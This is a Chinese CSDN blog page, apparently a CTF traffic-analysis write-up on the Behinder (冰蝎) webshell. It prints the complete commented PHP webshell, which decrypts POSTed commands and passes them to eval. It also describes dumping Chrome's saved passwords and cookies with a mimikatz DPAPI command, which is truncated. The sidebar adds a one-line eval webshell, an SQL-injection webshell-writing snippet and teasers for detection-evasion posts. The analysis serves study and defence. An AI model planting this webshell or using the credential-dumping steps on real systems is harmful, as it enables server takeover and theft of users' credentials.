php一句话木马_记一次对“冰蝎”一句话木马流量的分析

最新推荐文章于 2024-07-19 20:43:50 发布
最新推荐文章于 2024-07-19 20:43:50 发布
阅读量945 收藏 2
点赞数
文章标签: php一句话木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39905816/article/details/111651205
版权
本文介绍了对“冰蝎”PHP一句话木马的分析,包括其功能和实现方式,并展示了如何离线导出Chrome浏览器中保存的密码。在3CTF复赛的流量分析中,揭示了黑客攻击数据包的解密过程,通过Wireshark分析HTTP流量,解密获取服务器上的敏感信息。
摘要由CSDN通过智能技术生成

预备知识

“冰蝎”php一句话木马分析

“冰蝎”是什么?它是一款动态二进制加密网站管理客户端,它可以在HTTP明文协议中建立加密隧道,可以用于躲避传统的WAF、IDS等设备的检测。项目地址:

https://github.com/rebeyond/Behinder

“冰蝎”一句话木马可由Java、php、.net等语言来实现,我们以php为例来看这种新型的php一句话木马的实现:

<?php @error_reporting(0);session_start();//如果接收到pass参数,则会生成16位的随机秘钥,存储到session中if (isset($_GET['pass'])){
        $key=substr(md5(uniqid(rand())),16);    $_SESSION['k']=$key;    print $key;}//如果没接收到pass参数,则利用存储到session的秘钥进行解密else{
        $key=$_SESSION['k'];    //接收POST来的加密后的待执行命令  $post=file_get_contents("php://input");    //如果不能加载openssl扩展,则使用base64解码  if(!extension_loaded('openssl'))  {
        $t="base64_"."decode";    $post=$t($post."");    for($i=0;$i           $post[$i] = $post[$i]^$key[$i+1&15];           }  }    //使用openssl进行AES解密  else  {
        $post=openssl_decrypt($post, "AES128", $key);  }    /*    将解密后的$Ppost以`|`分割为数组;例如$post为assert|eval('phpinfo();'),那么分割后为:    array("assert", "eval('phpinfo();')")    */    $arr=explode('|',$post);    $func=$arr[0];    $params=$arr[1];  class C{
    public function __construct($p) {
    eval($p."");}}    //创建C类,利用__construct中的eval来执行解密后的值  @new C($params);}?>
离线导出Chrome浏览器中保存的密码

DPAPI,Data Protection Application Programming Interface,是Windows系统的一个数据保护接口,主要用于保护加密的数据。Chrome使用DPAPI保存了我们的登录密码和cookie值

用户使用Chrome访问网站进行登录时,可以选择是否保存密码。当选择保存密码时,Chrome先将密码进行加密,再保存在SQLite数据库文件中,数据库文件路径位于:

%LocalAppData%\Google\Chrome\User Data\Default\Login Data

同上,保存Cookie时,数据库文件路径为:

%LocalAppData%\Google\Chrome\User Data\Default\Cookies

存储的cookie值被加密为DPAPI blob来进行保护;我们可以通过使用Mimikatz这个工具来对Chrome中的SQLite数据库进行解析:

mimikatz dpapi::chrome /in:'%LocalAppData%\Google\Chrome\User
最低0.47元/天 解锁文章
weixin_39905816
关注
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
冰蝎一句话分析
西部壮仔的博客
10-13 4726
冰蝎php一句话木马分析冰蝎”是什么?它是一款动态二进制加密网站管理客户端,它可以在HTTP明文协议中建立加密隧道,可以用于躲避传统的WAF、IDS等设备的检测。项目地址: https://github.com/rebeyond/Behinder “冰蝎一句话木马可由Java、php、.net等语言来实现,我们以php为例来看这种新型的php一句话木马的实现: <?php @error_reporting(0); session_start(); //如果接收到pass参数,则会生成16位
冰蝎behinder生成马
最新发布
2401_84927603的博客
07-19 251
使用冰蝎Behinder生成马
【原创】利用动态二进制加密实现新型一句话木马PHP
weixin_34415923的博客
05-24 587
概述 本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。 本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是: 利用动态二进制加密实现新型一句话木马之Java篇 利用动态二进制加密实现新型一句话木马之.net篇 利用动态二进制加密实现新型...
php冰蝎一句话,利用动态二进制加密实现新型一句话木马PHP篇(转)冰蝎
weixin_32550525的博客
04-05 851
概述本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是:利用动态二进制加密实现新型一句话木马之Java篇利用动态二进制加密实现新型一句话木马之.net篇利用动态二进制加密实现新型一句话木马...
一次对“冰蝎一句话木马流量分析
蚁景网安学院
11-18 1836
预备知识“冰蝎php一句话木马分析冰蝎”是什么?它是一款动态二进制加密网站管理客户端,它可以在HTTP明文协议中建立加密隧道,可以用于躲避传统的WAF、IDS等设备的检测。项目地址:...
一句话木马要点和防范注意事项
05-24
例如,一个简单的PHP一句话木马可能如下所示: ```php <?php eval($_GET['cmd']); ?> ``` 这个例子中,`eval`函数会执行通过GET参数`cmd`传入的任何PHP代码,从而让攻击者能够控制服务器。 了解了一句话木马的基本...
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2392
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
基于 python 实现的千倍速一句话木马密码爆破工具
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
php mysql 注入一句话木马_phpmyadmin写一句话木马拿webshell思路(骇客协会)
weixin_35562134的博客
01-28 1325
先介绍MySQL导出一句话木马的语法(我个人比较喜欢说思路)Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES(' php eval_r($_POST[cmd]);?>'); //把一句话木...
【HIDS PHP 冰蝎webshell bypass】冰蝎马 D盾牧云
qq_37561898的博客
04-08 557
核心:php5使用preg_replace /e模式 混淆eval,其他函数关键词从注释中获取使得绕过动态引擎。现在D盾可疑一级,经过测试发现文件中含有^符号,就会直接报一级,一个小姿势绕过。检测(长亭牧云,阿里云盾),打乱变量函数调用形式绕过静态引擎检测(D盾等)原理:使用取反~实现和^相同效果的代替方案。bypass HIDS处理(PHP 5)原始webshell
冰蝎+文件上传+木马控制
NSQ0207的博客
07-14 674
木马文件:shell.php。在Pikaqiu网站输入路径。
冰蝎WebShell免杀生成
Fly_鹏程万里
06-02 454
ByPassBehinder / 冰蝎WebShell免杀生成文件:ByPassBehinder.exe。
改造冰蝎马,实现免杀之default_aes php
realmels的博客
12-17 1289
之前发的免杀文章有人说失效了。确实失效了。shellcode的免杀失效了,webshell的免杀被杀了。按理说我应该把之前的文章删掉。但是我不仅没有删,还开了一个专栏叫免杀。因为免杀这种东西,就是提供一个思路。你顺着这个思路,自己对你的shellcode或者webshell进行改造。然后不要发到网上去。发到网上去就会被waf的爬虫找到,然后你的免杀就失效了。我在写之前的文章就料到有这样一天。
冰蝎PHP流量还原
hibari_18的博客
12-03 1398
0x01前言 之前打3ctf的时候看见了一道冰蝎流量还原的misc,之后觉得还挺有意思的,毕竟之前网站被种过马 ,弄出来之后搞个工具结合全流量设备或者wireshark的包来还原攻击者到底做了哪些动作,故有了此文。 0x02环境准备 phpstudy(注意在php环境中要开一下php_openssl,默认好像是没开的) 冰蝎v2.0 0x03过程 首先贴一下一般用的冰蝎PHP码: <?ph...
冰蝎php马静态免杀
qq_61807674的博客
04-02 1296
其实还有小马哥的腾讯哈勃,但是那个不支持上传webshell,上传压缩包虽然行,但是如果压缩一遍了连冰蝎原马都查杀不出来,就当图一乐了,就不放出来了.....大部分云沙箱和在线查杀我都基本试过了,基本除了安恒云沙箱都能稳过(ah一生之敌),因为我的测试环境是php7.3往上了,没法用assert拼接执行,估计是检测到了eval执行字符串代码,所以静态检测没过,太丢脸就不放截图啦,师傅们可以按着自己的想法改改试试()但是也正常,只是做了基础的静态免杀而已,其实处理还是不够到位的,心态要端正,很不错了!
冰蝎4.0jsp木马浅析
Dokii_i的博客
01-16 2908
这里简单学习一下冰蝎是怎么运行的,如何通过加密解密来绕过一些常见的waf设备在看完了冰蝎是怎么连接之后,对于冰蝎的工作原理也有了一定的理解,本地和服务器端都做加密和解密的操作,以此来绕过流量检测设备以及一些waf,而且通过动态的加载class字节码,也可以绕过一些普通的webshell查杀设备,后续的一些绕过,可以在加密方式以及特征值的修改上入手。
红队大杀器 Behinder_v4.0(冰蝎4.0)
热门推荐
zip471642048的博客
07-25 1万+
httpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttpshttps。
Web提权技巧:一句话木马的免杀艺术
文章以ASP、ASPX、PHP一句话木马为例,展示了它们的结构相似性,并通过实例展示了D盾(一个Web查杀工具)对这些原生木马的查杀情况。 接下来,文章可能会进一步介绍如何分析和修改这些一句话木马,使其能够避开...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值